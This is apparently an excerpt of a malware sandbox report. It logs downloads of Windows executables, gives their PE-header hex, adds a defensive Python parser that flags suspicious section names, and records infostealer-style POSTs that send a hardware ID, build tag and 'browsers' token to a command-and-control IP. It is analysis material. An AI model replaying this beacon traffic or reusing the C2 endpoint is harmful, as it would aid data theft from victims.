Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:25:11 GMTContent-Type: application/octet-streamContent-Length: 1876480Last-Modified: Sat, 27 Jul 2024 06:54:41 GMTConnection: keep-aliveETag: "66a499b1-1ca200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 f9 d2 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 57 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 57 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 74 67 69 75 79 6e 00 90 19 00 00 d0 30 00 00 8a 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 72 62 79 7a 70 77 63 00 10 00 00 00 60 4a 00 00 04 00 00 00 7c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 80 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:25:13 GMTContent-Type: application/octet-streamContent-Length: 1897984Last-Modified: Sat, 27 Jul 2024 06:55:15 GMTConnection: keep-aliveETag: "66a499d3-1cf600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 1c 10 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 76 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 78 73 66 7a 68 73 00 e0 19 00 00 a0 31 00 00 da 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 7a 66 6b 64 61 63 00 10 00 00 00 80 4b 00 00 06 00 00 00 ce 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:25:13 GMTContent-Type: application/octet-streamContent-Length: 1897984Last-Modified: Sat, 27 Jul 2024 06:55:15 GMTConnection: keep-aliveETag: "66a499d3-1cf600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 1c 10 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 76 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 78 73 66 7a 68 73 00 e0 19 00 00 a0 31 00 00 da 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 7a 66 6b 64 61 63 00 10 00 00 00 80 4b 00 00 06 00 00 00 ce 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:26:05 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Sat, 27 Jul 2024 07:22:24 GMTConnection: keep-aliveETag: "66a4a030-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 64 67 94 73 20 06 fa 20 20 06 fa 20 20 06 fa 20 4f 70 51 20 3b 06 fa 20 4f 70 64 20 30 06 fa 20 4f 70 50 20 44 06 fa 20 29 7e 69 20 2b 06 fa 20 20 06 fb 20 55 06 fa 20 4f 70 55 20 21 06 fa 20 4f 70 60 20 21 06 fa 20 4f 70 67 20 21 06 fa 20 52 69 63 68 20 06 fa 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 ad 62 40 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 f9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 08 5b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 59 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 18 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4a 33 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6f 77 6f 00 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6e 61 64 65 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 07:26:08 GMTContent-Type: application/octet-streamContent-Length: 3248128Last-Modified: Sat, 27 Jul 2024 06:53:52 GMTConnection: keep-aliveETag: "66a49980-319000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 63 99 a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 f8 81 af 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 af 00 00 04 00 00 db a2 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 40 8d 00 2b 0e 00 00 7c 4e 8d 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 8d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 b0 79 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 90 22 00 00 10 8d 00 00 88 22 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
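The "Data Raw" dumps above are only the first bytes of each downloaded executable, but that prefix always covers the DOS header, the COFF header and the section table, which is where the "PE file contains section with special chars" signature comes from: the nginx-hosted payloads carry sections named with nothing but spaces, random eight-letter names and a ".taggant" section, while the Apache-hosted ones look like ordinary MSVC builds. The following parser, an added example for this report and not Joe Sandbox code, reads a dump in that hex format and flags such sections. The header built by build_sample() is constructed with struct to mirror the pattern; it is not copied from the page, and its timestamp is arbitrary.

```python
"""Parse a PE header from a "Data Raw" hex dump and flag odd section names.
Added example for this report (not Joe Sandbox code). build_sample() is a
constructed header, not bytes copied from the page."""
import datetime
import re
import string
import struct

# Section names a stock compiler/linker emits; anything else deserves a look.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                   ".rsrc", ".reloc", ".tls", ".bss", ".didat", ".00cfg", ".CRT", ".gfids"}
NAME_CHARS = set(string.ascii_letters + string.digits + "._$@")
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_data_raw(hexdump: str) -> bytes:
    """Turn the report's space-separated hex ("4d 5a 90 00 ...") into bytes.
    A dangling single nibble at the end of a truncated dump is dropped."""
    return bytes(int(t, 16) for t in re.findall(r"[0-9a-fA-F]{2}", hexdump))


def parse_sections(blob: bytes) -> dict:
    """Walk DOS header -> e_lfanew -> "PE\\0\\0" -> COFF header -> section table."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=0x%x" % e_lfanew)
    coff = e_lfanew + 4
    machine, nsections, stamp, _sym, _nsym, opt_size, _flags = struct.unpack_from("<HHIIIHH", blob, coff)
    table = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsections):
        off = table + i * 40              # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(blob):
            break                         # dump truncated before the table ends
        raw_name, vsize, vaddr, rsize, rptr, _r, _l, _nr, _nl, chars = struct.unpack_from("<8sIIIIIIHHI", blob, off)
        sections.append({"name": raw_name.split(b"\0", 1)[0].decode("latin-1"),
                         "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rsize, "raw_pointer": rptr, "characteristics": chars})
    return {"machine": machine, "num_sections": nsections, "sections": sections,
            "timestamp_utc": datetime.datetime.fromtimestamp(stamp, tz=datetime.timezone.utc).isoformat()}


def suspicious_sections(parsed: dict) -> list:
    """Return (name, reason) for sections with odd names or RWX permissions."""
    findings = []
    for s in parsed["sections"]:
        name, reasons = s["name"], []
        if name.strip() == "":
            reasons.append("empty or whitespace-only name")
        elif any(c not in NAME_CHARS for c in name):
            reasons.append("special characters in name")
        elif name not in COMMON_SECTIONS:
            reasons.append("non-standard name")
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable and executable")
        if reasons:
            findings.append((name, "; ".join(reasons)))
    return findings


def build_sample() -> str:
    """Constructed PE32 header in "Data Raw" format (not from the page)."""
    secs = [(b".text", 0x1000, 0x1000, 0x1000, 0x400, 0x60000020),
            (b"   ", 0x68000, 0x2000, 0, 0, 0xE0000040),           # spaces only, RWX
            (b"cwtgiuyn", 0x19900, 0x30D000, 0x198A00, 0x2F200, 0xE0000040),
            (b".taggant", 0x3000, 0x4A7000, 0x2200, 0x1C8000, 0xE0000040)]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    opt_size = 0xE0                                                 # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0x66A24110, 0, 0, opt_size, 0x0102)
    optional = bytes([0x0B, 0x01]) + bytes(opt_size - 2)            # magic PE32, rest zeroed
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in secs)
    return (bytes(dos) + b"PE\0\0" + coff + optional + table).hex(" ")


if __name__ == "__main__":
    info = parse_sections(parse_data_raw(build_sample()))
    print(info["timestamp_utc"], info["num_sections"])
    for name, why in suspicious_sections(info):
        print(repr(name), why)
```

To use it on the report, paste the hex after "Data Raw:" into parse_data_raw(); the dumps above are long enough for every section table shown. The TimeDateStamp the parser prints can be set against the server's Last-Modified header: a stamp far newer or older than the file on the server is another cue that the binary was rebuilt or stamped by a packer.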
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 41 41 32 45 43 42 43 45 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 2d 2d 0d 0a Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="hwid"25AA2ECBCE684217651120------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="build"sila------EHDGIJJDGCBKFIDHIEBK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJDHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="message"browsers------FBKJDGCGDAAAKECAKKJD--
